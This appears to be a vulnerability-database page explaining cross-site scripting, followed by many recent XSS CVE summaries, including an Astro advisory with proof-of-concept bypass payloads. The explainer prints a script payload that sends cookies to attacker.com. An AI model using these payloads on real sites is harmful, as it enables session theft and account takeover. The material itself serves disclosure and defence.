Cross-Site Scripting
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.
How It Works
Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.
The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.
A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.
Impact
- Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
- Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
- Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
- Keylogging: Monitor and exfiltrate everything users type on the compromised page
- Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
- Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests
Real-World Examples
A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.
eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.
British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.
Mitigation
- Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
- Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
- HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
- Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
- DOM-based XSS prevention: Use safe APIs like
textContentinstead ofinnerHTML; avoid passing user data to dangerous sinks likeeval()
Recent CVEs (38830)
Unauthenticated remote attackers can upload arbitrary files to any path in a+HCM developed by aEnrich, including executable HTML documents, enabling cross-site scripting and potential server-side impacts. The vulnerability requires user interaction (UI:A) but allows unrestricted file placement with low scope and integrity impact. No patch version or active exploitation data is currently available.
Reflected cross-site scripting (XSS) in Silverpeas Core before version 6.4.6 allows unauthenticated remote attackers to execute arbitrary JavaScript in users' browsers via malicious input to the AdvancedSearch functionality. The vulnerability requires user interaction (clicking a crafted link) and affects confidentiality and integrity with partial technical impact. Publicly available exploit code exists, and CISA SSVC assessment confirms proof-of-concept availability, though this vulnerability is not yet confirmed in active widespread exploitation.
WWBN AVideo is an open source video platform. In versions 29.0 and below, the incomplete XSS fix in AVideo's `ParsedownSafeWithLinks` class overrides `inlineMarkup` for raw HTML but does not override `inlineLink()` or `inlineUrlTag()`, allowing `javascript:` URLs in markdown link syntax to bypass sanitization. Commit cae8f0dadbdd962c89b91d0095c76edb8aadcacf contains an updated fix.
WWBN AVideo is an open source video platform. In versions 29.0 and below, the `isValidDuration()` regex at `objects/video.php:918` uses `/^[0-9]{1,2}:[0-9]{1,2}:[0-9]{1,2}/` without a `$` end anchor, allowing arbitrary HTML/JavaScript to be appended after a valid duration prefix. The crafted duration is stored in the database and rendered without HTML escaping via `echo Video::getCleanDuration()` on trending pages, playlist pages, and video gallery thumbnails, resulting in stored cross-site scripting. Commit bcba324644df8b4ed1f891462455f1cd26822a45 contains a fix.
Docmost is open-source collaborative wiki and documentation software. Prior to 0.80.0, when leaving a comment on a page, it is possible to include a JavaScript URI as the link. When a user clicks on the link the JavaScript executes. This vulnerability is fixed in 0.80.0.
## Summary The `defineScriptVars` function in Astro's server-side rendering pipeline uses a case-sensitive regex `/<\/script>/g` to sanitize values injected into inline `<script>` tags via the `define:vars` directive. HTML parsers close `<script>` elements case-insensitively and also accept whitespace or `/` before the closing `>`, allowing an attacker to bypass the sanitization with payloads like `</Script>`, `</script >`, or `</script/>` and inject arbitrary HTML/JavaScript. ## Details The vulnerable function is `defineScriptVars` at `packages/astro/src/runtime/server/render/util.ts:42-53`: ```typescript export function defineScriptVars(vars: Record<any, any>) { let output = ''; for (const [key, value] of Object.entries(vars)) { output += `const ${toIdent(key)} = ${JSON.stringify(value)?.replace( /<\/script>/g, // ← Case-sensitive, exact match only '\\x3C/script>', )};\n`; } return markHTMLString(output); } ``` This function is called from `renderElement` at `util.ts:172-174` when a `<script>` element has `define:vars`: ```typescript if (name === 'script') { delete props.hoist; children = defineScriptVars(defineVars) + '\n' + children; } ``` The regex `/<\/script>/g` fails to match three classes of closing script tags that HTML parsers accept per the [HTML specification §13.2.6.4](https://html.spec.whatwg.org/multipage/parsing.html#parsing-main-inbody): 1. **Case variations**: `</Script>`, `</SCRIPT>`, `</sCrIpT>` - HTML tag names are case-insensitive but the regex has no `i` flag. 2. **Whitespace before `>`**: `</script >`, `</script\t>`, `</script\n>` - after the tag name, the HTML tokenizer enters the "before attribute name" state on ASCII whitespace. 3. **Self-closing slash**: `</script/>` - the tokenizer enters "self-closing start tag" state on `/`. `JSON.stringify()` does not escape `<`, `>`, or `/` characters, so all these payloads pass through serialization unchanged. **Execution flow:** User-controlled input (e.g., `Astro.url.searchParams`) → assigned to a variable → passed via `define:vars` on a `<script>` tag → `renderElement` → `defineScriptVars` → incomplete sanitization → injected into `<script>` block in HTML response → browser closes the script element early → attacker-controlled HTML parsed and executed. ## PoC **Step 1:** Create an SSR Astro page (`src/pages/index.astro`): ```astro --- const name = Astro.url.searchParams.get('name') || 'World'; --- <html> <body> <h1>Hello</h1> <script define:vars={{ name }}> console.log(name); </script> </body> </html> ``` **Step 2:** Ensure SSR is enabled in `astro.config.mjs`: ```js export default defineConfig({ output: 'server' }); ``` **Step 3:** Start the dev server and visit: ``` http://localhost:4321/?name=</Script><img/src=x%20onerror=alert(document.cookie)> ``` **Step 4:** View the HTML source. The output contains: ```html <script>const name = "</Script><img/src=x onerror=alert(document.cookie)>"; console.log(name); </script> ``` The browser's HTML parser matches `</Script>` case-insensitively, closing the script block. The `<img onerror=alert(document.cookie)>` is then parsed as HTML and the JavaScript in `onerror` executes. **Alternative bypass payloads:** ``` /?name=</script ><img/src=x onerror=alert(1)> /?name=</script/><img/src=x onerror=alert(1)> /?name=</SCRIPT><img/src=x onerror=alert(1)> ``` ## Impact An attacker can execute arbitrary JavaScript in the context of a victim's browser session on any SSR Astro application that passes request-derived data to `define:vars` on a `<script>` tag. This is a documented and expected usage pattern in Astro. Exploitation enables: - **Session hijacking** via cookie theft (`document.cookie`) - **Credential theft** by injecting fake login forms or keyloggers - **Defacement** of the rendered page - **Redirection** to attacker-controlled domains The vulnerability affects all Astro versions that support `define:vars` and is exploitable in any SSR deployment where user input reaches a `define:vars` script variable. ## Recommended Fix Replace the case-sensitive exact-match regex with a comprehensive escape that covers all HTML parser edge cases. The simplest correct fix is to escape all `<` characters in the JSON output: ```typescript export function defineScriptVars(vars: Record<any, any>) { let output = ''; for (const [key, value] of Object.entries(vars)) { output += `const ${toIdent(key)} = ${JSON.stringify(value)?.replace( /</g, '\\u003c', )};\n`; } return markHTMLString(output); } ``` This is the standard approach used by frameworks like Next.js and Rails. Replacing every `<` with `\u003c` is safe inside JSON string contexts (JavaScript treats `\u003c` as `<` at runtime) and eliminates all possible `</script>` variants including case variations, whitespace, and self-closing forms.
mailcow: dockerized is an open source groupware/email suite based on docker. In versions prior to 2026-03b, the mailcow web interface passes the raw `$_SERVER['REQUEST_URI']` to Twig as a global template variable and renders it inside a JavaScript string literal in the `setLang()` helper of `base.twig`, relying on Twig's default HTML auto-escaping instead of the context-appropriate `js` escaping strategy. In addition, the `query_string()` Twig helper merges all current `$_GET` parameters into the language-switching links on the login page, so attacker-supplied parameters are reflected and preserved across navigation. Version 2026-03b fixes the vulnerability.
Cross-site scripting in mailcow dockerized versions prior to 2026-03b enables remote attackers to execute malicious JavaScript in victim browsers through a chained Login CSRF and Self-XSS attack. Exploitation requires low-privileged attacker credentials and victim interaction, but can result in unauthorized access to victim email accounts and session hijacking (CVSS 7.0, AV:N/AC:H/PR:L/UI:P). The vulnerability stems from insufficient HTML escaping of X-Real-IP header values in the login history dashboard, combined with server trust of client-supplied IP headers. No active exploitation or public POC identified at time of analysis, but technical details disclosed via GitHub Security Advisory make weaponization feasible.
Stored cross-site scripting (XSS) in mailcow: dockerized (versions prior to 2026-03b) allows remote unauthenticated attackers to execute arbitrary JavaScript in administrator sessions by delivering emails with malicious attachment filenames. When administrators view quarantined emails through the web interface, unsanitized filenames inject into HTML without escaping, triggering automatic JavaScript execution that can compromise administrator accounts. No public exploit or active exploitation confirmed at time of analysis, though CVSS 8.9 (CVSS 4.0) reflects high impact with low attack complexity requiring user interaction.
Stored cross-site scripting in mailcow dockerized versions before 2026-03b enables remote attackers to execute arbitrary JavaScript in admin sessions by injecting malicious code through unauthenticated Autodiscover requests. The payload persists in Redis and triggers when administrators view Autodiscover logs on the admin dashboard. CVSS 9.3 reflects the network attack vector and high cross-scope impact, though exploitation requires admin interaction (UI:P) and no public exploit has been identified at time of analysis.
Stored cross-site scripting (XSS) in Bagisto up to version 2.3.15 allows authenticated attackers to inject malicious scripts via the Custom Scripts Handler component, which are then executed in the browsers of other users with user-interaction. The vulnerability has publicly available exploit code and affects the integrity of user sessions. Vendor has acknowledged the issue and committed to fixes in upcoming releases but no patched version has been released at time of analysis.
Reflected cross-site scripting in Bludit CMS search plugin allows unauthenticated attackers to inject arbitrary JavaScript through malicious search queries. When users visit attacker-crafted URLs containing the XSS payload, malicious scripts execute in their browsers, enabling session cookie theft and actions performed on behalf of victims. Publicly available exploit code exists; patch available via commit 6732dde.
Mass assignment vulnerability in FreeScout versions before 1.8.213 allows authenticated administrators to covertly exfiltrate all outgoing emails and inject malicious content into email communications. By exploiting unfiltered parameter binding in mailbox connection settings endpoints, an attacker with admin credentials can silently set auto_bcc to forward copies of every outgoing email, redirect SMTP traffic through attacker-controlled servers, inject tracking pixels or phishing links into signatures, and enable malicious auto-replies-all invisible to other administrators. The CVSS score of 9.0 reflects high confidentiality and integrity impact with changed scope, though exploitation requires high-privilege (admin) access. No public exploit code or CISA KEV listing identified, but the vulnerability is particularly dangerous in multi-admin deployments and when combined with session compromise vectors like XSS (noted in tags), as it provides persistent email surveillance beyond initial access.
Account takeover in blueprintUE Self-Hosted Edition <4.2.0 allows authenticated attackers to permanently hijack any account by changing its password without current password verification. Attackers who obtain session access through XSS, session hijacking, physical access, or stolen cookies can immediately lock out legitimate users. The vulnerability requires low-privileged authentication (PR:L) but has high confidentiality and integrity impact, enabling full account control and data access. Fixed in version 4.2.0.
Cross-site scripting (XSS) in WebSystems WebTOTUM 2026 Calendar component allows authenticated remote attackers to inject malicious scripts via an unknown function, requiring user interaction for exploitation. Publicly available exploit code exists, and vendor has released a patched version following responsible disclosure.
Stored cross-site scripting in Twenty CRM versions prior to 1.20.6 allows authenticated attackers to inject malicious JavaScript URIs into file block attachments via the BlockNote editor, executing arbitrary code in the browsers of users who click the malicious link. The vulnerability bypasses protocol validation in the FileBlock component and lacks server-side sanitization of block content; exploitation requires user interaction (clicking the attachment) but persistence is stored on the server, affecting all subsequent users who view the compromised document.
Reflected cross-site scripting (XSS) in October CMS backend DataTable widget allows unauthenticated remote attackers to inject arbitrary JavaScript via a query parameter, requiring user interaction to execute malicious code. The vulnerability affects versions prior to 3.7.16 and 4.1.16, with a low severity CVSS score of 3.1 reflecting the requirement for high attack complexity and user clicking a malicious link.
Stored cross-site scripting in FreeScout versions prior to 1.8.213 allows authenticated users with mailbox signature permissions to inject arbitrary JavaScript that executes automatically whenever any agent or administrator opens a conversation in the affected mailbox. The vulnerability stems from inadequate HTML sanitization (blocklisting only four tags: script, form, iframe, object) that permits event handlers on elements like <img>, <svg>, and <details>. Exploitation requires only low-privilege authenticated access (ACCESS_PERM_SIGNATURE permission) and triggers without user interaction (CVSS UI:N), enabling session hijacking under certain CSP bypass conditions, phishing overlays, email exfiltration via mass assignment, and self-propagating worm behavior across all mailboxes. EPSS data not provided; no public exploit code or CISA KEV listing identified at time of analysis. Vendor-released patch available in version 1.8.213.
Stored cross-site scripting (XSS) in FreeScout prior to version 1.8.213 allows remote attackers to inject arbitrary HTML attributes into email message bodies by embedding unescaped double-quote characters in URLs. When the linkify() function converts plain-text URLs to anchor tags without proper escaping, attackers can break out of the href attribute and inject malicious JavaScript or event handlers. This requires user interaction (UI:R) to view a crafted email, but once viewed, the injected script executes in the context of the victim's session with potential for account compromise or data theft.
HTML injection vulnerability in PHP Point of Sale v19.4 allows unauthenticated remote attackers to render arbitrary HTML in victims' browsers via the '/reports/generate/specific_customer' endpoint, affecting the 'start_date_formatted' and 'end_date_formatted' parameters. User interaction is required (victim must visit a crafted link), limiting impact to stored/reflected XSS scenarios. No public exploit code or active exploitation has been confirmed at the time of analysis.
Reflected cross-site scripting (XSS) in Semantic MediaWiki 5.0.2 allows unauthenticated remote attackers to inject malicious JavaScript via the '/index.php/Speciaal:GefacetteerdZoeken' endpoint parameter. A victim visiting an attacker-crafted URL executes arbitrary JavaScript in their browser, enabling session cookie theft or unauthorized actions on behalf of the user. User interaction (clicking the link) is required. No public exploit code or active exploitation has been identified at time of analysis.
Reflected cross-site scripting in Navigate CMS allows remote attackers to inject and execute arbitrary JavaScript in victims' browsers via unsanitized query parameters in the /blog endpoint. The vulnerability affects Navigate CMS versions 0 through 2.9.5 and requires user interaction (clicking a malicious link). CVSS 5.1 reflects the limited scope (only session/cookie theft) and mandatory user interaction, though exploitation is straightforward for phishing campaigns.
Reflected cross-site scripting (XSS) in the Website LLMs.txt WordPress plugin versions up to 8.2.6 allows unauthenticated attackers to inject arbitrary JavaScript via the 'tab' parameter due to improper use of filter_input() without sanitization and insufficient output escaping. Exploitation requires social engineering an administrator to click a malicious link, but once successful grants the attacker ability to execute scripts in the admin's browser session with access to sensitive WordPress functions and data.
Stored cross-site scripting in Website LLMs.txt plugin for WordPress versions up to 8.2.6 allows authenticated administrators to inject arbitrary JavaScript into plugin settings that executes when any user visits affected pages. The vulnerability requires high privilege level (PR:H) and occurs only in multi-site installations or where unfiltered_html capability is disabled. No public exploit code or active exploitation has been identified.
CSS injection in FreeScout mailbox signatures enables CSRF token exfiltration and privilege escalation from authenticated agents to administrators. The vulnerability exists in FreeScout versions prior to 1.8.213 where incomplete input sanitization fails to strip <style> tags from mailbox signature fields. Attackers with mailbox configuration access leverage CSS attribute selectors to steal CSRF tokens from viewing users, then perform arbitrary state-changing actions including admin account creation. EPSS data not available; no confirmed active exploitation (CISA KEV absent). Vendor patch released in version 1.8.213 with complete fix addressing previous incomplete remediation (GHSA-jqjf-f566-485j).
Reflected cross-site scripting (XSS) in Dovestones ADPhonebook versions below 4.0.1.1 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser via the search parameter of the /ADPhonebook?Department=HR endpoint. User input is reflected without proper encoding. Publicly available exploit code exists, though CISA KEV status is not confirmed, and CVSS 6.1 with UI:R indicates user interaction is required for successful exploitation.
Stored Cross-Site Scripting in wpDataTables WordPress plugin (all versions up to 6.5.0.4) allows unauthenticated attackers to inject malicious scripts into data tables via insufficient input sanitization in LinkWDTColumn, ImageWDTColumn, and EmailWDTColumn classes. Exploitation requires an Administrator to import attacker-controlled data with affected column types configured, but once injected, the malicious script executes for all users viewing the infected page. No public exploit code or active exploitation confirmed at time of analysis.
Stored XSS in Image Source Control Lite WordPress plugin versions up to 3.9.1 allows authenticated attackers with Author-level permissions or higher to inject malicious scripts via the 'Image Source' attachment field, executing arbitrary JavaScript in the browsers of any user viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping in the attachment metadata handler. No public exploit code or active exploitation has been confirmed at the time of analysis, but the low attack complexity and network accessibility make this a practical risk for multi-author WordPress installations.
GFI HelpDesk before version 4.99.9 contains a stored cross-site scripting vulnerability in language management where the charset POST parameter is not HTML-sanitized before being rendered by the View_Language.RenderGrid() function. An authenticated administrator can inject arbitrary JavaScript through the charset field when creating or editing a language, with the payload executing in the browsers of other administrators viewing the Languages page. This is a medium-risk vulnerability limited to authenticated administrators but affecting any admin viewer.
GFI HelpDesk before version 4.99.9 allows authenticated administrators to inject stored cross-site scripting (XSS) payloads via the companyname parameter in template group creation and editing, with malicious scripts executing in the browsers of other administrators viewing the Templates > Groups page. The attack requires administrative credentials and user interaction (victim viewing the affected page), but succeeds against all administrator accounts with access to that interface.
Stored cross-site scripting in GFI HelpDesk before version 4.99.9 allows authenticated staff members to inject arbitrary JavaScript via the Troubleshooter step subject field, with execution occurring when any user views the affected step. The vulnerability stems from unsanitized POST parameter handling in Controller_Step.InsertSubmit() and EditSubmit() methods, enabling persistent payload storage and broad user impact within the application.
GFI HelpDesk before version 4.99.9 allows authenticated staff members to inject persistent JavaScript into ticket subject fields via inadequate sanitization in the editsubject POST parameter, enabling arbitrary script execution when other staff or administrators view affected tickets. The vulnerability impacts confidentiality and integrity within the application's scope, with exploitation confirmed possible but requiring valid staff credentials and user interaction (viewing the malicious ticket). Patch version 4.99.9 or later is available from the vendor.
Stored cross-site scripting in GFI HelpDesk before version 4.99.10 allows authenticated attackers to inject arbitrary JavaScript into report titles via the Reports module, with payload execution triggered when staff members access the report link in the Manage Reports interface. The vulnerability requires attacker authentication and user interaction (clicking the report link), limiting real-world impact to internal staff compromise scenarios rather than mass exploitation. Patch is available from the vendor.
Cross-site scripting (XSS) in erponline.xyz ERP Online up to version 4.0.0 allows authenticated attackers with high privileges to inject malicious scripts via the Item Name parameter on the Inventory Edit Item Page, requiring user interaction to execute. Publicly available exploit code exists, and the vendor has not responded to early disclosure notification, leaving affected deployments without a patched remediation path.
Stored cross-site scripting in Vvveb prior to 1.0.8.1 allows authenticated users with media upload and rename permissions to execute arbitrary JavaScript in administrator browsers by bypassing MIME type validation with a GIF89a header prepend, renaming files to .html extensions, and injecting malicious payloads that can create backdoor accounts or upload remote code execution plugins. Publicly available exploit code exists and vendor-released patch 1.0.8.1 is available. Real-world risk is moderate due to authentication requirement and required user interaction (administrator must visit malicious page), but privilege escalation path to RCE via plugin upload makes this a critical persistence vector.
Cross-site scripting (XSS) in Qibo CMS 1.0 Internal Message Module allows authenticated remote attackers to inject malicious scripts through message manipulation, affecting user sessions and data integrity. The vulnerability requires user interaction (UI:P) and valid authentication (PR:L), limiting exposure to authenticated users. Public exploit code is available, though the vendor has not responded to disclosure attempts.
Stored cross-site scripting (XSS) in Yifang CMS up to version 2.0.5 allows authenticated attackers to inject malicious scripts via the Account parameter in the Extended Management Module's RBAC admin component, affecting stored data integrity with user interaction required. The vulnerability has publicly available proof-of-concept code, though the CVSS score of 3.5 reflects its limited scope (no confidentiality or availability impact, information disclosure only). The vendor has not responded to early disclosure efforts.
Cross-site scripting (XSS) in BichitroGan ISP Billing Software 2025.3.20 allows authenticated high-privilege users to inject malicious scripts via the Pool List Interface (/?_route=pool/add endpoint), affecting data integrity through stored or reflected XSS. The vulnerability requires administrator authentication and user interaction (UI:R), limiting immediate risk; however, publicly available exploit code exists and the vendor has not responded to disclosure, leaving affected deployments without an official patch.
Stored cross-site scripting (XSS) in BichitroGan ISP Billing Software 2025.3.20 allows authenticated high-privilege users to inject malicious scripts via the Profile Page Handler settings/users-view endpoint, affecting subsequent users who view the compromised profile. The vulnerability requires high-privilege authentication and user interaction (page viewing), limiting exploitation scope; however, publicly available proof-of-concept code exists and the vendor has not responded to disclosure attempts.
Stored cross-site scripting (XSS) in BichitroGan ISP Billing Software 2025.3.20 allows authenticated remote attackers with high privileges to inject malicious scripts via the Customer Handler edit endpoint (/?_route=customers/edit/), affecting other users who view manipulated customer records. Exploitation requires user interaction (victim viewing the crafted page), but publicly available exploit code exists and the vendor has not responded to disclosure attempts.
Cross-site scripting in Dify's ImagePreview component (web/app/components/base/image-uploader/image-preview.tsx) allows authenticated users to inject malicious scripts via the filename argument in the openInNewTab function, affecting versions up to 1.13.3. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting impact to low integrity compromise with no confidentiality or availability impact. Publicly available exploit code exists; vendor has not responded to early disclosure.
The Email Encoder WordPress plugin before 2.3.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks. Rated low severity (CVSS 3.5), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.
Reflected cross-site scripting (XSS) in Silex Technology SD-330AC and AMC Manager allows remote attackers to execute arbitrary JavaScript in users' browsers when they visit crafted web pages after authenticating to the affected device. The vulnerability requires user interaction and affects both products across all versions. No patch release or active exploitation status has been confirmed.
Stored cross-site scripting (XSS) in langflow-ai langflow up to version 1.8.3 allows authenticated users to inject malicious scripts into chat messages via the edit-message component, which are then executed in the browsers of other users viewing the manipulated message. The vulnerability requires user interaction (recipient must view the crafted message) and authenticated access, limiting scope to users within a langflow instance, but publicly available exploit code exists and the vendor has not responded to early disclosure.
Cross-site scripting (XSS) in ComfyUI up to version 0.13.0 allows authenticated remote attackers to inject malicious scripts through the View Endpoint in server.py, affecting user integrity with publicly available exploit code. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting its severity despite network accessibility. ComfyUI's vendor has not responded to early disclosure attempts, and the exploit has been published on GitHub, making this a low-CVSS but publicly weaponized vulnerability affecting an AI image generation framework.
Stored cross-site scripting (XSS) in ComfyUI's userdata endpoint (getuserdata function in app/user_manager.py) allows authenticated attackers to inject malicious scripts that execute in other users' browsers. Affected versions range from 0.1 through 0.13.0. The vulnerability requires user interaction (UI:R) and authenticated access (PR:L), limiting real-world impact, but publicly available exploit code exists and the vendor has not responded to disclosure.
Stored cross-site scripting (XSS) in Apartment Visitors Management System v1.1 allows authenticated attackers to inject malicious JavaScript via the visname parameter in visitors-form.php, which executes when other users view the injected data in manage-newvisitors.php or visitor-detail.php. The vulnerability requires user interaction (victim visiting affected pages) and valid authentication but can escalate privileges, steal session tokens, or perform actions on behalf of administrative users viewing visitor records.
Stored cross-site scripting (XSS) in Wavlink WL-WN579A3 wireless router allows remote unauthenticated attackers to inject malicious scripts via the Hostname parameter in /cgi-bin/login.cgi, affecting all firmware versions prior to 2026-03-10. The vulnerability requires user interaction (UI:R) to trigger payload execution in a victim's browser, limiting direct remote code execution but enabling credential theft, session hijacking, or malware distribution. A vendor patch was released promptly after responsible disclosure.
Stored cross-site scripting (XSS) in EMC - Easily Embed Calendly Scheduling Features WordPress plugin versions 4.4 and earlier allows authenticated contributors and above to inject arbitrary JavaScript into pages via insufficiently sanitized shortcode attributes, executing malicious scripts whenever site visitors access the affected pages. No public exploit code or active exploitation has been confirmed at analysis time.
Stored Cross-Site Scripting in Contextual Related Posts plugin for WordPress (versions up to 4.2.1) allows authenticated contributors and above to inject malicious scripts via the 'other_attributes' parameter, which execute in the browsers of all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping, enabling privilege escalation from contributor-level access to site-wide code execution. No active exploitation in the wild has been confirmed, but the attack requires only authenticated access at a low privilege level that is commonly granted in WordPress environments.
Stored Cross-Site Scripting in Categories Images WordPress plugin versions up to 3.3.1 allows authenticated contributors and above to inject malicious scripts via the 'class' attribute of the 'z_taxonomy_image' shortcode, which executes in the context of other users viewing the affected page. The vulnerability stems from insufficient HTML escaping in the shortcode's fallback image builder. No public exploit code or active exploitation has been identified, but the attack requires only authenticated contributor-level access and user interaction with the injected content.
Stored Cross-Site Scripting in Content Blocks (Custom Post Widget) plugin for WordPress affects all versions up to 3.3.9, allowing authenticated contributors and above to inject arbitrary JavaScript via the content_block shortcode that executes in the browsers of all users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping; no public exploit code or active exploitation has been identified at the time of analysis, but the low attack complexity and broad scope (cross-site) make this a significant risk for WordPress sites with untrusted contributor accounts.
Stored XSS in Flipbox Addon for Elementor WordPress plugin (versions ≤2.1.1) allows authenticated authors to inject malicious scripts via the button URL custom_attributes field due to insufficient validation of attribute names. The vulnerability uses esc_html() on attribute names, which fails to block event handler attributes like onmouseover and onclick, enabling arbitrary JavaScript execution in pages viewed by any user. CVSS 6.4 reflects the requirement for authenticated author-level access, but the stored nature and cross-site scope increase practical risk. Patch available in version 2.1.2.
Stored Cross-Site Scripting in CoBlocks Page Builder plugin for WordPress allows authenticated Contributor-level users to inject malicious scripts via external iCal feed data in the Events block, executing arbitrary JavaScript in pages visited by any user. The vulnerability exists in all versions through 3.1.16 due to insufficient output escaping of event titles, descriptions, and locations. CVSS 6.4 reflects limited direct impact (confidentiality and integrity) but broad scope across WordPress installations, and no public exploit code or active exploitation has been confirmed at this time.
Youzify plugin for WordPress (versions up to 1.3.6) allows authenticated subscribers to execute stored cross-site scripting attacks via the 'checkin_place_id' parameter due to insufficient input sanitization and output escaping. An attacker with subscriber-level access can inject arbitrary JavaScript that executes when other users view the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been identified at the time of this analysis.
Reflected XSS in Hostel WordPress plugin versions up to 1.1.6 allows unauthenticated attackers to inject arbitrary JavaScript via the 'shortcode_id' parameter, requiring user interaction (clicking a malicious link) to execute. The vulnerability stems from insufficient input sanitization and output escaping in the shortcode handling code. No public exploit code or active exploitation has been identified at time of analysis.
File upload validation bypass in Postiz social media scheduler (versions before 2.21.6) allows authenticated users to upload executable file types (HTML, SVG) with spoofed Content-Type headers, achieving stored XSS when nginx serves files using their original extensions. Attackers can hijack sessions and take over other user accounts. CVSS 8.9 (High) reflects network attack vector with low complexity requiring only low-privilege authentication and user interaction. EPSS data not provided. Not listed in CISA KEV. Vendor patch released in version 2.21.6.
ChurchCRM versions prior to 7.2.0 allow authenticated users with Finance permissions to store malicious JavaScript in pledge donation comments via missing HTML escaping, which executes in the browsers of any subsequent users who edit the pledge record, resulting in stored cross-site scripting (XSS). The vulnerability requires Finance role access and victim interaction (opening the pledge editor), but affects all users who view the compromised record, with no known public exploit code or active exploitation confirmed at time of analysis.
Stored cross-site scripting in ChurchCRM UserEditor.php prior to version 7.2.0 allows authenticated administrators to inject malicious HTML and JavaScript into username fields, which then executes in the browsers of other administrators viewing the user editor page. The vulnerability stems from failure to sanitize usernames before rendering them into HTML input value attributes, and exploitation requires administrator-level privileges combined with user interaction (another admin viewing the compromised user's editor). This is a low-CVSS but real privilege-escalation concern within multi-administrator deployments, particularly where administrators may have differing trust levels.
Stored XSS in Pz-LinkCard WordPress plugin (all versions through 2.5.8.1) allows Contributor-level authenticated users to inject malicious scripts via the 'blogcard' shortcode attributes due to insufficient input sanitization and output escaping. Injected scripts execute in the context of any user viewing the affected page, enabling session hijacking, credential theft, or malware distribution. No public exploit code or active exploitation has been confirmed at time of analysis.
DOMSanitizer before version 1.0.10 fails to sanitize CSS content within SVG <style> elements, allowing attackers to inject url() references and @import rules that trigger unauthorized HTTP requests to attacker-controlled hosts when the sanitized SVG is rendered in a browser. This affects PHP applications using the vulnerable library to sanitize user-supplied SVG content, enabling information disclosure through request metadata and potential CSRF attacks. The vulnerability requires user interaction (rendering the SVG) but affects all downstream users of the sanitized content due to scope change (C:L, S:C).
Reflected cross-site scripting (XSS) in Stirling-PDF versions before 2.0.0 allows unauthenticated remote attackers to execute arbitrary JavaScript in a victim's browser by uploading a file with a malicious filename containing script code. The vulnerability affects multiple file upload endpoints that render user-supplied filenames directly into HTML via unsafe DOM manipulation methods without sanitization. Attack requires user interaction (victim must upload the crafted file), limiting real-world impact. No public exploit code or active exploitation has been identified at time of analysis.
Stored Cross-Site Scripting in WeGIA 'Member Registration' function allows remote attackers to inject malicious JavaScript through the 'Member Name' field, achieving persistent code execution in victim browsers without authentication. The payload executes whenever users navigate to affected pages, enabling session hijacking, credential theft, or administrative action execution. Version 3.6.10 provides a vendor-released patch. No public exploit identified at time of analysis, though exploitation is straightforward given the unauthenticated attack vector (CVSS AV:N/PR:N).
Stored XSS in WeGIA versions prior to 3.6.10 allows authenticated high-privilege users to inject malicious JavaScript via the Destinatário field, with payloads persisted and executed when other users view the dispatch page. The vulnerability requires administrative or high-privilege authentication but impacts confidentiality of all users accessing affected pages. No public exploit code or active exploitation has been reported.
Stored Cross-Site Scripting in WeGIA versions prior to 3.6.10 allows authenticated users to inject malicious JavaScript into the Intercorrências notification page, which executes when other users access that page, enabling session hijacking and account takeover. The vulnerability requires user authentication to inject the payload but affects all subsequent viewers of the notification page without additional user interaction. Patch version 3.6.10 resolves the issue.
Stored XSS in WeGIA patient management system (versions before 3.6.10) allows authenticated high-privilege users to inject malicious JavaScript via the patient name field, with execution occurring when patient records are subsequently viewed. The vulnerability affects all instances of WeGIA prior to version 3.6.10, where the fix has been released. Exploitation requires administrative or high-privilege account access but can compromise confidentiality and session integrity of users viewing affected patient records.
Cross-site scripting (XSS) in lukevella Rallly up to version 4.7.4 allows authenticated users to inject malicious scripts via the redirectTo parameter in the reset password form, affecting the stored XSS vector with user interaction required. The vulnerability has public exploit code available and is mitigated by upgrading to version 4.8.0 or later. Real-world risk is limited by the requirement for authenticated access and user interaction, but the publicly available exploit increases attack feasibility.
